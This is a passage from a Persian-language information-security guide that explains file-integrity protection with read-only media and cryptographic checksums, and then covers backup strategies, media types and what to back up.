‫ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ‬
‫ﺑﺮﺍﻱ ﻣﺒﺎﺭﺯﻩ ﺑﺎ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﭼﻨﺪﻳﻦ ﺭﺍﻩ ﻣﺨﺘﻠﻒ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﻋﻼﻭﻩ ﺑﺮ ﻣﺮﺍﻗﺒﺖ ﺩﺭ ﺳﺎﺯﻣﺎﻧﺪﻫﻲ ﺍﺧﺘﻴـﺎﺭﺍﺕ ﻛـﺎﺭﺑﺮﺍﻥ ﻭ ﻓﺎﻳﻠﻬـﺎ‪ ،‬ﺍﺯ ﻓﺎﻳﻠﻬـﺎﻱ‬
‫ﻣﻬﻤﻲ ﻛﻪ ﺩﻳﺮ ﺑﻪ ﺩﻳﺮ ﺗﻐﻴﻴﺮ ﻣﻲﻛﻨﻨﺪ ﻣﻲﺗﻮﺍﻥ ﺭﻭﻱ ﺭﺳﺎﻧﻪﻫﺎﻱ ﻓﻘﻂ‪-‬ﺧﻮﺍﻧﺪﻧﻲ‪ ١١٥‬ﻧﮕﻬﺪﺍﺭﻱ ﻛﺮﺩ‪ .‬ﻓﺎﻳﻠﻬﺎ ﻫﻤﭽﻨﻴﻦ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺭﻣﺰﮔـﺬﺍﺭﻱ‬
‫ﺷﻮﻧﺪ ﺗﺎ ﺑﺮﺍﻱ ﺗﻐﻴﻴﺮ ﺍﻃﻼﻋﺎﺕ ﻣﻮﺟﻮﺩ ﺩﺭ ﺁﻧﻬﺎ ﺑﻪ ﮔﺬﺭ ﺍﺯ ﻣﺮﺍﺣﻞ ﺍﻣﻨﻴﺘﻲ ﺑﻴﺸﺘﺮﻱ ﻧﻴﺎﺯ ﺑﺎﺷﺪ‪) .‬ﻣﻤﻜﻦ ﺍﺳﺖ ﻋﻠﻴﺮﻏﻢ ﺍﻳﻨﻜﺎﺭ‪ ،‬ﻫﻤﭽﻨﺎﻥ ﺣﺬﻑ ﻳﺎ ﺧـﺮﺍﺏ‬
‫ﻛﺮﺩﻥ ﺍﻳﻦ ﻓﺎﻳﻠﻬﺎ ﺍﻣﻜﺎﻧﭙﺬﻳﺮ ﺑﺎﺷﺪ‪(.‬‬
‫ﻫﻤﭽﻨﻴﻦ ﺷﻴﻮﻩﻫﺎﻱ ﺯﻳﺎﺩﻱ ﺑﺮﺍﻱ ﺁﺷﻜﺎﺭ ﻛﺮﺩﻥ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻛﻮﭼﻜﺘﺮ ﻳﺎ ﻫﻨﮕﺎﻣﻴﮑﻪ ﺗﻌﺪﺍﺩ ﻓﺎﻳﻠﻬﺎﻱ ﻛﻠﻴﺪﻱ ﻛﻪ‬
‫ﺑﺎﻳﺪ ﺍﺯ ﺁﻧﻬﺎ ﻣﺤﻔﺎﻇﺖ ﺷﻮﺩ ﻣﺤﺪﻭﺩ ﺍﺳﺖ‪ ،‬ﺗﻬﻴﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺍﺯ ﻓﺎﻳﻠﻬﺎ ﺭﻭﻱ ﺭﺳﺎﻧﻪﻫﺎﻱ ﻓﻘﻂ‪-‬ﻧﻮﺷﺘﻨﻲ‪ ١١٦‬ﻣﻲﺗﻮﺍﻧـﺪ ﺍﺳـﺘﺮﺍﺗﮋﻱ ﻣـﺆﺛﺮﻱ ﺑﺎﺷـﺪ‪.‬‬
‫ﻓﺎﻳﻠﻬﺎ ﺑﻄﻮﺭ ﻣﻨﻈﻢ ﺑﺎ ﻫﻤﺘﺎﻫﺎﻱ ﺁﺭﺷﻴﻮﺷﺪﺓ ﺧﻮﺩ ﻣﻘﺎﻳﺴﻪ ﻣﻲﺷﻮﻧﺪ ﻭ ﺍﮔﺮ ﻳﻚ ﻓﺎﻳﻞ ﺧﺮﺍﺏ ﺷﺪ‪ ،‬ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺑﺮﺍﻱ ﺍﺣﻴﺎﻱ ﺁﻥ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ‪ ،‬ﻭ ﻭﻗﺘﻲ ﻳﻚ ﺗﻐﻴﻴﺮ ﻣﺠﺎﺯ ﺑﻪ ﻓﺎﻳﻞ ﺩﺍﺩﻩ ﺷﻮﺩ‪ ،‬ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﻧﻴﺰ ﺑﺎ ﺁﻥ ﻫﻤﺎﻫﻨﮓ ﻣﻲﮔﺮﺩﺩ‪.‬‬

‫‪115 Read-Only Media‬‬


‫‪116 Write-Once Media‬‬
‫‪٣٠٧‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﺧﻼﺻﻪﻫﺎﻱ ﺭﻣﺰﺷﺪﺓ ﻓﺎﻳﻠﻬﺎﻱ ﻣﻬﻢ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺼﻮﺭﺕ ‪ offline‬ﻣﺤﺎﺳﺒﻪ ﻭ ﺫﺧﻴﺮﻩ ﺷﻮﻧﺪ ﻭ ﻳﺎ ﺑﺎ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺗﺤﺖ ﻣﺤﺎﻓﻈﺖ ﻗـﺮﺍﺭ ﮔﻴﺮﻧـﺪ‪.‬‬
‫ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﭘﻴﺸﺘﺮ ﮔﻔﺘﻪ ﺷﺪ ﻳﻚ ﻭﻳﮋﮔﻲ ﻣﻬﻢ ﺧﻼﺻﻪﻫﺎﻱ ﺭﻣﺰﺷﺪﻩ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻧﻤﻲﺗﻮﺍﻥ ﻓﺎﻳﻞ ﺟﺪﻳﺪﻱ ﺗﻮﻟﻴﺪ ﻛﺮﺩ ﻛﻪ ﺧﻼﺻﺔ ﺁﻥ ﺑـﺎ‬
‫ﺧﻼﺻﺔ ﻣﺤﺎﺳﺒﻪ ﺷﺪﻩ ﺗﻄﺒﻴﻖ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ .‬ﺑﻌﻀﻲ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺿﺪﻭﻳﺮﻭﺱ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻋﻤﻠﻜﺮﺩﻱ ﻣـﺸﺎﺑﻪ ‪ -‬ﻛـﻪ ﺍﻏﻠـﺐ ‪inoculation‬‬
‫ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷﻮﺩ ‪ -‬ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ‪ ،‬ﺁﻧﺠﺎ ﻛﻪ ﺳﺮﺟﻤﻌﻬﺎ ﻭﺍﺭﺩ ﻓﺎﻳﻠﻬـﺎﻱ ﺍﺟﺮﺍﻳـﻲ ﻣـﻲﺷـﻮﻧﺪ‪ .‬ﺩﺭ ﻓـﺼﻞ ﭘـﻨﺠﻢ ﺩﺭ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻓﺎﻳﻠﻬـﺎﻱ‬
‫ﻣﻘﺎﻳﺴﻪﺍﻱ ﻭ ﺧﻼﺻﻪﻫﺎﻱ ﺭﻣﺰﺷﺪﻩ ﺑﺮﺍﻱ ﻣﻤﻴﺰﻱ ﻣﺪﺍﻭﻡ ﺩﺍﺩﻩﻫﺎﻱ ﺳﻴﺴﺘﻢ ﺑﺤﺚ ﻣﻔﺼﻠﺘﺮﻱ ﺍﺭﺍﺋﻪ ﻣﻲﺷﻮﺩ‪.‬‬

‫ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ‬
‫ﻻ ﻋﻠﻴﺮﻏﻢ ﺑﻬﺘﺮﻳﻦ ﺗﻼﺷﻬﺎ ﻧﻤﻲﺗـﻮﺍﻥ ﺍﺯ ﻭﻗـﻮﻉ‬ ‫ﻧﻘﺼﻬﺎ‪ ،‬ﺣﻮﺍﺩﺙ‪ ،‬ﺑﻼﻳﺎﻱ ﻃﺒﻴﻌﻲ‪ ،‬ﻭ ﺣﻤﻼﺕ ﺑﻪ ﺳﻴﺴﺘﻢ ﺭﺍ ﻧﻤﻲﺗﻮﺍﻥ ﭘﻴﺶﺑﻴﻨﻲ ﻛﺮﺩ ﻭ ﻣﻌﻤﻮ ﹰ‬
‫ﺁﻧﻬﺎ ﺟﻠﻮﮔﻴﺮﻱ ﻧﻤﻮﺩ؛ ﺍﻣﺎ ﺍﮔﺮ ﭘﻴﺸﺘﻴﺒﺎﻥ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺭﺍ ﺗﺮﻣﻴﻢ ﻧﻤﺎﻳﻴﺪ ﻭ ﺑﻪ ﻳﻚ ﻭﺿﻌﻴﺖ ﭘﺎﻳﺪﺍﺭ ﺑﺮﺳﺎﻧﻴﺪ‪ .‬ﺣﺘـﻲ ﺍﮔـﺮ‬
‫ﻼ ﺑﻪ ﻋﻠﺖ ﺁﺗﺶﺳﻮﺯﻱ ‪ -‬ﺍﺯ ﺩﺳﺖ ﺑﺪﻫﻴﺪ‪ ،‬ﺑﺎ ﻳﻚ ﻣﺠﻤﻮﻋﺔ ﻛﺎﻣﻞ ﺍﺯ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﻣﻲﺗﻮﺍﻧﻴـﺪ ﺑﻌـﺪ ﺍﺯ ﺧﺮﻳـﺪ ﺩﺳـﺘﮕﺎﻩ‬ ‫ﺗﻤﺎﻡ ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ ﺭﺍ ‪ -‬ﻣﺜ ﹰ‬
‫ﺟﺎﻳﮕﺰﻳﻦ‪ ،‬ﺍﻃﻼﻋﺎﺕ ﺧﻮﺩ ﺭﺍ ﺑﺎﺯﻳﺎﺑﻲ ﻧﻤﺎﻳﻴﺪ‪ .‬ﻫﺰﻳﻨﺔ ﺭﻳﺰﭘﺮﺩﺍﺯﻧﺪﻩ ﻭ ﺩﻳﺴﻚﮔﺮﺩﺍﻥ ﺟﺪﻳﺪ ﻣﻲﺗﻮﺍﻧﺪ ﺗﻮﺳـﻂ ﺷـﺮﻛﺖ ﺑﻴﻤـﻪ ﺗـﺄﻣﻴﻦ ﺷـﻮﺩ‪ ،‬ﺍﻣـﺎ‬
‫ﺍﻃﻼﻋﺎﺕ ﺷﻤﺎ ﭼﻴﺰﻱ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﻮﺍﺭﺩ ﻏﻴﺮﻗﺎﺑﻞ ﺟﺎﻳﮕﺰﻳﻨﻲ ﺧﻮﺍﻫﺪ ﺑﻮﺩ‪.‬‬
‫ﻻ ﺑﺪﻭﻥ ﺩﻟﻴـﻞ ﻣﺸﺨـﺼﻲ ﺧـﺮﺍﺏ ﻣـﻲﺷـﺪ ﻭ‬ ‫ﺳﺎﻟﻬﺎ ﻗﺒﻞ‪ ،‬ﺗﻬﻴﺔ ﭘﺸﺘﻴﺒﺎﻧﻬﺎﻱ ﺭﻭﺯﺍﻧﻪ ﻛﺎﺭﻱ ﻣﺮﺳﻮﻡ ﺷﺪﻩ ﺑﻮﺩ‪ ،‬ﭼﻮﻥ ﺳﺨﺖﺍﻓﺰﺍﺭ ﺭﺍﻳﺎﻧﻪ ﻣﻌﻤﻮ ﹰ‬
‫ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺗﻨﻬﺎ ﺭﺍﻩ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺍﺯ ﺩﺳﺖ ﺭﻓﺘﻦ ﺩﺍﺩﻩ ﺑﻪ ﺣﺴﺎﺏ ﻣﻲﺁﻳﺪ‪ .‬ﺍﻣﺮﻭﺯ ﻫﻢ ﺧﺮﺍﺑﻲ ﺳﺨﺖﺍﻓـﺰﺍﺭ ﻫﻨـﻮﺯ ﺩﻟﻴـﻞ ﺧـﻮﺑﻲ ﺑـﺮﺍﻱ ﺗﻬﻴـﻪ‬
‫ﻼ ﺗﺼﺎﺩﻓﻲ ﺍﺳﺖ‪ ،‬ﭼﺮﺍﮐﻪ ﺣﺘﻲ ﺍﮔﺮ ﻳﻚ ﺩﻳﺴﻚ ﺳﺨﺖ ﺧﻮﺏ ﺑﻄـﻮﺭ‬ ‫ﭘﺸﺘﻴﺒﺎﻥ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎ ﺍﺳﺖ‪ .‬ﺍﺣﺘﻤﺎﻝ ﺧﺮﺍﺏ ﺷﺪﻥ ﺩﻳﺴﮏ ﺳﺨﺖ ﻛﺎﻣ ﹰ‬
‫ﻣﺘﻮﺳﻂ ‪ ۵‬ﺳﺎﻝ ﻳﺎ ﻛﻤﻲ ﺑﻴﺸﺘﺮ ﻋﻤﺮ ﻛﻨﺪ‪ ،‬ﺳﺎﺯﻣﺎﻧﻲ ﺑﺎ ﺣﺪﻭﺩ ‪ ۲۰‬ﺗﺎ ‪ ۳۰‬ﺩﻳﺴﻚ ﺳﺨﺖ ﺑﺎﻳﺪ ﺩﺭ ﻫـﺮ ﭼﻨـﺪ ﻣـﺎﻩ ﻣﻨﺘﻈـﺮ ﻳـﻚ ﺧﺮﺍﺑـﻲ ﻗﺎﺑـﻞ‬
‫ﻻ ﺑﺪﻭﻥ ﻫﺸﺪﺍﺭ ﻗﺒﻠﻲ ﺧﺮﺍﺏ ﻣﻲﺷﻮﻧﺪ ‪ -‬ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺗﻨﻬﺎ ﭼﻨﺪ ﺭﻭﺯ ﺑﻌﺪ ﺍﺯ ﺁﻧﻜﻪ ﻣﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ‬ ‫ﻣﻼﺣﻈﻪ ﺑﺎﺷﺪ‪ .‬ﺩﻳﺴﻚﮔﺮﺩﺍﻧﻬﺎ ﻣﻌﻤﻮ ﹰ‬
‫ﮔﺮﻓﺘﻨﺪ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﻛﺎﺭ ﻋﻘﻼﻧﻲ ﺗﻬﻴﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺍﺯ ﺳﻴﺴﺘﻢ ﺩﺭ ﺑﺎﺯﻩﻫﺎﻱ ﺯﻣﺎﻧﻲ ﻣﻨﻈﻢ ﺍﺳﺖ‪.‬‬
‫ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺑﺰﺍﺭ ﻣﻬﻤﻲ ﺑﺮﺍﻱ ﺍﻳﻤﻦ ﻛﺮﺩﻥ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺩﺭ ﺑﺮﺍﺑﺮ ﺣﻤﻼﺕ ﺑﺎﺷﻨﺪ‪ .‬ﺑﺨﺼﻮﺹ‪ ،‬ﭘﺸﺘﻴﺒﺎﻥ ﻛﺎﻣﻞ ﺑـﻪ ﺷـﻤﺎ ﺍﺟـﺎﺯﻩ‬
‫ﻣﻲﺩﻫﺪ ﺑﺎ ﻣﻘﺎﻳﺴﺔ ﻓﺎﻳﻠﻬﺎﻱ ﺭﻭﻱ ﺭﺍﻳﺎﻧﻪ ﻭ ﻓﺎﻳﻠﻬﺎﻱ ﺭﻭﻱ ﭘﺸﺘﻴﺒﺎﻥ‪ ،‬ﺁﻧﭽﻪ ﺭﺍ ﻣﻬﺎﺟﻢ ﻋﻮﺽ ﻛﺮﺩﻩ ﺑﻴﺎﺑﻴﺪ‪ .‬ﺍﻭﻟﻴﻦ ﭘﺸﺘﻴﺒﺎﻥ ﺍﺯ ﺳﻴـﺴﺘﻢ ﺧـﻮﺩ ﺭﺍ‬
‫ﺑﻌﺪ ﺍﺯ ﻧﺼﺐ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﺗﻬﻴﻪ ﻛﻨﻴﺪ‪ ،‬ﻭ ﺑﻌﺪ ﺍﺯ ﺁﻥ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﺧﻮﺩ ﺭﺍ ﻧﺼﺐ ﻭ ﺍﺻﻼﺣﻬﺎﻱ ﻻﺯﻡ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺍﻋﻤﺎﻝ ﻧﻤﺎﻳﻴﺪ‪ .‬ﺍﻭﻟـﻴﻦ‬
‫ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﻧﻪﺗﻨﻬﺎ ﺑﻪ ﺷﻤﺎ ﺍﺟﺎﺯﻩ ﻣﻲﺩﻫﺪ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺭﺍ ﺑﻌﺪ ﺍﺯ ﺣﻤﻠﻪ ﺗﺤﻠﻴﻞ ﻛﻨﻴﺪ ﺗﺎ ﺑﻔﻬﻤﻴﺪ ﭼﻪ ﭼﻴـﺰﻱ ﺗﻐﻴﻴـﺮ ﻛـﺮﺩﻩ ﺍﺳـﺖ‪ ،‬ﺑﻠﻜـﻪ‬
‫ﻲ ﺳﺎﺧﺖ ﻣﺠﺪﺩ ﺳﻴﺴﺘﻢ ﺭﺍ ﻧﻴﺰ ﻛﺎﻫﺶ ﺩﻫﺪ‪.‬‬‫ﺩﺭﺻﻮﺭﺕ ﻭﻗﻮﻉ ﺧﺮﺍﺑﻲ ﺩﺭ ﺳﺨﺖﺍﻓﺰﺍﺭ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﺪ ﻭﻗﻔﺔ ﺯﻣﺎﻧ ﹺ‬

‫ﭼﮕﻮﻧﻪ ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴﻪ ﻛﻨﻴﻢ‬


‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﻼ ﺑﻪ ﻧﻤﻮﻧﻪﻫﺎﻳﻲ ﺍﺷﺎﺭﻩ ﺷﺪﻩ ﺍﺳﺖ‪:‬‬


‫ﺍﻣﺮﻭﺯﻩ ﭼﻨﺪﻳﻦ ﺷﻜﻞ ﻣﺨﺘﻠﻒ ﺍﺯ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ ﮐﻪ ﺫﻳ ﹰ‬
‫ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ﺍﺯ ﻓﺎﻳﻠﻬﺎﻱ ﺣﻴﺎﺗﻲ ﺩﺭ ﺩﻳﺴﻚ ﻧﻮﺭﻱ ﻳﺎ ﺩﻳﺴﻚ ﻣﻐﻨﺎﻃﻴﺴﻲ ﻣﺘﺤﺮﻙ ﺑﺎ ﻇﺮﻓﻴﺖ ﺯﻳﺎﺩ؛‬ ‫•‬
‫ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ﻫﺮ ﺍﺯ ﭼﻨﺪﮔﺎﻩ ﺩﻳﺴﻚ ﺩﺭ ﻳﻚ ﺩﻳﺴﻚ ‪ spare‬ﻳﺎ ﺍﻧﻌﻜﺎﺳﻲ؛‬ ‫•‬
‫‪١١٧‬‬
‫ﺍﻧﻌﻜﺎﺳﻲ ﻛﺮﺩﻥ ﺩﻭ ﺩﻳﺴﻚ ﺑﺼﻮﺭﺕ ﻫﻤﺰﻣﺎﻥ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ‪ RAID‬ﺳﺨﺖﺍﻓﺰﺍﺭﻱ ﻳﺎ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ؛‬ ‫•‬
‫ﺗﻬﻴﺔ ﺑﺎﻳﮕﺎﻧﻴﻬﺎﻱ ﺩﻭﺭﻩﺍﻱ ‪ ،sit ،zip‬ﻳﺎ ‪ tar‬ﺍﺯ ﻓﺎﻳﻠﻬﺎﻱ ﻣﻬﻢ؛ ﻛﻪ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﺍﺯ ﺁﻧﻬـﺎ ﺭﻭﻱ ﺳﻴـﺴﺘﻢ ﺍﻭﻟﻴـﻪ ﻭ ﻳـﺎ ﺩﺭ ﻣﻜـﺎﻧﻲ ﺩﻳﮕـﺮ‬ ‫•‬
‫ﻧﮕﻬﺪﺍﺭﻱ ﻛﻨﻴﺪ؛‬
‫ﺗﻬﻴﺔ ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺭﻭﻱ ﻧﻮﺍﺭ ﻧﻮﺭﻱ ﻳﺎ ﻣﻐﻨﺎﻃﻴﺴﻲ؛ ﻭ‬ ‫•‬
‫ﺗﻬﻴﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺑﺮﺍﻱ ﻓﺎﻳﻠﻬﺎ ﺍﺯ ﻃﺮﻳﻖ ﺷﺒﻜﻪ ﻳﺎ ﺍﻳﻨﺘﺮﻧـﺖ ﺭﻭﻱ ﺭﺍﻳﺎﻧـﺔ ﺩﻳﮕـﺮﻱ ﻛـﻪ ﺻـﺎﺣﺐ ﺁﻥ ﻫـﺴﺘﻴﺪ‪ ،‬ﻳـﺎ ﺭﻭﻱ ﻳـﻚ ﺳـﺮﻭﻳﺲ‬ ‫•‬
‫ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﺍﻳﻨﺘﺮﻧﺘﻲ‪.‬‬

‫‪117 Redundant Array of Independent Disks‬‬


‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٣٠٨‬‬

‫ﻼ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺳﺮﺟﻤﻌﻬﺎﻱ ‪ MD5‬ﻓﺎﻳﻠﻬﺎﻱ ﺷﻤﺎ ﺭﺍ ﺑﺮﺭﺳـﻲ ﻛﻨﻨـﺪ ﻭ ﺗﻨﻬـﺎ ﺍﺯ‬ ‫ﺑﻌﻀﻲ ﺍﺯ ﺍﻳﻦ ﺧﺪﻣﺎﺕ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺴﻴﺎﺭ ﻣﺎﻫﺮﺍﻧﻪ ﻋﻤﻞ ﻛﻨﻨﺪ‪ .‬ﻣﺜ ﹰ‬
‫ﻓﺎﻳﻠﻬﺎﻳﻲ ﻛﻪ ﻳﻜﺘﺎ ﻫﺴﺘﻨﺪ ﭘﺸﺘﻴﺒﺎﻥ ﺑﮕﻴﺮﻧﺪ‪ .‬ﺩﺭﺍﻳﻨﺼﻮﺭﺕ ﺍﮔﺮ ﺷﻤﺎ ﻫﺰﺍﺭﺍﻥ ﺭﺍﻳﺎﻧﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛـﻪ ﺭﻭﻱ ﺗﻤـﺎﻡ ﺁﻧﻬـﺎ ﺑﺮﻧﺎﻣـﻪ ‪Microsoft‬‬
‫‪ Office‬ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ ،‬ﻫﻴﭽﻜﺪﺍﻡ ﺍﺯ ﻓﺎﻳﻠﻬﺎﻱ ﺁﻥ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺑﻪ ﭘﺸﺘﻴﺒﺎﻥ ﺍﺿﺎﻓﻪ ﻧﻤﻲﺷﻮﻧﺪ‪.‬‬

‫ﺍﺯ ﭼﻪ ﭼﻴﺰﻱ ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴﻪ ﻛﻨﻴﻢ‬


‫ﺩﻭ ﺭﻭﺵ ﻛﻠﻲ ﺑﺮﺍﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪:‬‬
‫ﺗﻬﻴﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺍﺯ ﻫﺮﺁﻧﭽﻪ ﻛﻪ ﺩﺭ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﻣﻨﺤﺼﺮ ﺑﻪ ﻓـﺮﺩ ﺍﺳـﺖ ‪ -‬ﺣـﺴﺎﺑﻬﺎﻱ ﻛـﺎﺭﺑﺮﻱ‪ ،‬ﻓﺎﻳﻠﻬـﺎﻱ ﺩﺍﺩﻩ ﻭ ﺷـﺎﺧﻪﻫـﺎﻱ ﻣﻬـﻢ‬ ‫‪.١‬‬
‫ﺳﻴﺴﺘﻤﻲ ﻛﻪ ﺑﺮﺍﻱ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺍﺧﺘﺼﺎﺻﻲ‪ ١١٨‬ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺍﻳﻦ ﺷﻴﻮﻩ ﺩﺭ ﻧﻮﺍﺭ ﻳﺎ ﺩﻳﺴﻚ ﺻﺮﻓﻪﺟـﻮﻳﻲ ﻣـﻲﻛﻨـﺪ ﻭ ﺯﻣـﺎﻥ ﺗﻬﻴـﺔ ﻳـﻚ‬
‫ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺭﺍ ﻛﺎﻫﺶ ﻣﻲﺩﻫﺪ‪ .‬ﺩﺭﺻﻮﺭﺕ ﺧﺮﺍﺏ ﺷﺪﻥ ﺳﻴﺴﺘﻢ‪ ،‬ﺗﺮﻣﻴﻢ ﺭﺍ ﺍﺑﺘﺪﺍ ﺑﺎ ﻧﺼﺐ ﻣﺠﺪﺩ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﺭﺍﻳﺎﻧﻪ ﺧﻮﺩ ﻭ ﺳﭙﺲ‬
‫ﻧﺼﺐ ﻣﺠﺪﺩ ﻫﻤﺔ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﺷﺮﻭﻉ ﻣﻲﻛﻨﻴﺪ‪ ،‬ﻭ ﺑﻌﺪ ﺍﺯ ﺁﻥ ﻧﻮﺍﺭﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﺧﻮﺩ ﺭﺍ ﺍﺣﻴﺎ ﻣﻲﻧﻤﺎﻳﻴﺪ‪.‬‬
‫ﺗﻬﻴﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺍﺯ ﻫﻤﻪ ﭼﻴﺰ ‪ -‬ﭼﻮﻥ ﺑﺎﺯﺳﺎﺯﻱ ﻳﻚ ﺳﻴﺴﺘﻢ ﺑﻄﻮﺭ ﻛﺎﻣﻞ ﺁﺳﺎﻧﺘﺮ ﺍﺯ ﺗﺮﻣﻴﻢ ﻳﻚ ﺗﻜﻪ ﺍﺯ ﺳﻴﺴﺘﻢ ﺍﺳﺖ؛ ﻭ ﻗﻴﻤﺖ ﻧﻮﺍﺭ ﻫﻢ‬ ‫‪.٢‬‬
‫ﺍﺭﺯﺍﻥ ﻣﻲﺑﺎﺷﺪ‪.‬‬
‫ﻋﻤﻮﻣﹰﺎ ﺷﻴﻮﺓ ﺩﻭﻡ ﺑﺎﻳﺪ ﺗﺮﺟﻴﺢ ﺩﺍﺩﻩ ﺷﻮﺩ‪ .‬ﻋﻠﻴﺮﻏﻢ ﺍﻳﻨﻜﻪ ﻗـﺴﻤﺘﻲ ﺍﺯ ﺍﻃﻼﻋـﺎﺗﻲ ﻛـﻪ ﺷـﻤﺎ ﺍﺯ ﺁﻥ ﭘـﺸﺘﻴﺒﺎﻥ ﺗﻬﻴـﻪ ﻛـﺮﺩﻩﺍﻳـﺪ ﭘﻴـﺸﺘﺮ ﺭﻭﻱ‬
‫ﺩﻳﺴﻜﻬﺎﻱ ﺍﺻﻠﻲ ﺗﻮﺯﻳﻊ ﺷﺪﻩ ﻳﺎ ﻧﻮﺍﺭﻫﺎﻳﻲ ﻛﻪ ﺑﺮﺍﻱ ﺑﺎﺭﮔﺬﺍﺭﻱ ﺳﻴﺴﺘﻢ ﺑﻪ ﺭﻭﻱ ﺩﻳﺴﮏ ﺳﺨﺖ ﺍﺯ ﺁﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻛـﺮﺩﻩﺍﻳـﺪ ﭘـﺸﺘﻴﺒﺎﻥﮔﻴـﺮﻱ‬
‫ﺷﺪﻩﺍﻧﺪ‪ ،‬ﻭﻟﻲ ﻧﻮﺍﺭﻫﺎ ﻳﺎ ﺩﻳﺴﻜﻬﺎﻱ ﺗﻮﺯﻳﻊ ﻫﻢ ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﮔﻢ ﻣﻲﺷﻮﻧﺪ‪ .‬ﻋﻼﻭﻩ ﺑﺮ ﺁﻥ ﻫﻤﻴﻨﻄﻮﺭ ﻛﻪ ﻋﻤﺮ ﺳﻴـﺴﺘﻢ ﺷـﻤﺎ ﺯﻳـﺎﺩ ﻣـﻲﺷـﻮﺩ‪،‬‬
